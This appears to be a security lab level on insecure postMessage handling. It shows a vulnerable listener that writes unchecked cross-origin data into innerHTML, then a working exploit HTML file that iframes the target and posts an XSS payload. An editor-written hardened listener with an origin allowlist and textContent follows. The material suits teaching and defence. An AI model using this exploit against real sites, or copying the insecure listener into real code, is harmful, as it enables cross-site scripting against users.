Level 4: Insecure postMessage
MISSION: This frame listens for cross-origin messages. You need to write an exploit locally (e.g. an HTML file on your desktop) that iframes this URL and sends it a malicious message.
Source code (message listener):
    window.addEventListener('message', function(e) {
        if (e.data && e.data.type === 'updateText') {
            document.getElementById('msg-box').innerHTML = e.data.html;
        }
    });
The listener trusts messages from any origin (it never checks e.origin or e.source) and writes the sender-controlled html property straight into innerHTML, so whatever markup the sender supplies is parsed as part of the page. You must create a local HTML file and open it in your browser.
Exploit HTML File:
    <iframe src="http://localhost:3000/level4" id="target"></iframe>
    <script>
    // Give the frame a moment to load, then post the message to it.
    setTimeout(() => {
        document.getElementById('target').contentWindow.postMessage(
            { type: 'updateText', html: '<img src=x onerror=alert(1)>' },
            '*'
        );
    }, 1000);
    </script>
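For contrast, here is a hardened version of the level's listener. This is an added example written for this page, not code from the lab; the allowlisted origin `https://app.example.com`, the `text` field name (replacing the lab's `html`) and the length cap are assumptions chosen for the example. The decision logic lives in a plain function so it can be exercised outside a browser; the `window` wiring at the bottom only runs when a DOM is present.

```javascript
// Added example: a hardened replacement for the level's message listener.
// Editor-written, not part of the lab. The allowlist entry, the 'text' field
// name and MAX_TEXT_LENGTH are assumptions for the sake of the example.

// Exact origins allowed to drive this frame (constructed placeholder value).
const TRUSTED_ORIGINS = new Set(['https://app.example.com']);

// Upper bound on accepted text so a parent cannot flood the box.
const MAX_TEXT_LENGTH = 1000;

// Validate a MessageEvent-like object { origin, data } and decide what to show.
// Returns { accepted: true, text } or { accepted: false, reason }.
function handleUpdateText(event, trusted = TRUSTED_ORIGINS) {
  // 1. Origin check: exact match against the serialized origin. A page opened
  //    from file:// (like the exploit HTML above) reports the origin "null",
  //    so it is rejected here. Never use indexOf/startsWith/regex for this:
  //    "https://app.example.com.evil.test" would pass such a check.
  if (typeof event.origin !== 'string' || !trusted.has(event.origin)) {
    return { accepted: false, reason: 'untrusted origin: ' + String(event.origin) };
  }

  // 2. Shape check: only the expected message type, only a string payload.
  const d = event.data;
  if (d === null || typeof d !== 'object' || d.type !== 'updateText') {
    return { accepted: false, reason: 'unexpected message type' };
  }
  if (typeof d.text !== 'string') {
    return { accepted: false, reason: 'payload must be a string in "text"' };
  }
  if (d.text.length > MAX_TEXT_LENGTH) {
    return { accepted: false, reason: 'payload too long' };
  }

  return { accepted: true, text: d.text };
}

// Browser wiring; skipped when the file is loaded under Node.
if (typeof window !== 'undefined' && typeof document !== 'undefined') {
  window.addEventListener('message', function (e) {
    const result = handleUpdateText(e);
    if (!result.accepted) {
      console.warn('dropped postMessage:', result.reason);
      return;
    }
    // textContent inserts the string as text; markup in it is never parsed,
    // so a payload like '<img src=x onerror=alert(1)>' is displayed literally.
    document.getElementById('msg-box').textContent = result.text;
  });
}
```

Two points worth noting in practice: the origin comparison must be an exact match against the full serialized origin (scheme, host and port), and the sink must be one that treats the data as text. If a feature genuinely needs rich markup from the parent, the string has to go through an HTML sanitizer before reaching innerHTML; the origin check alone does not make innerHTML safe. On the sending side, the legitimate parent should likewise pass the frame's exact origin as targetOrigin instead of '*', so its messages cannot be delivered to a frame that has navigated elsewhere.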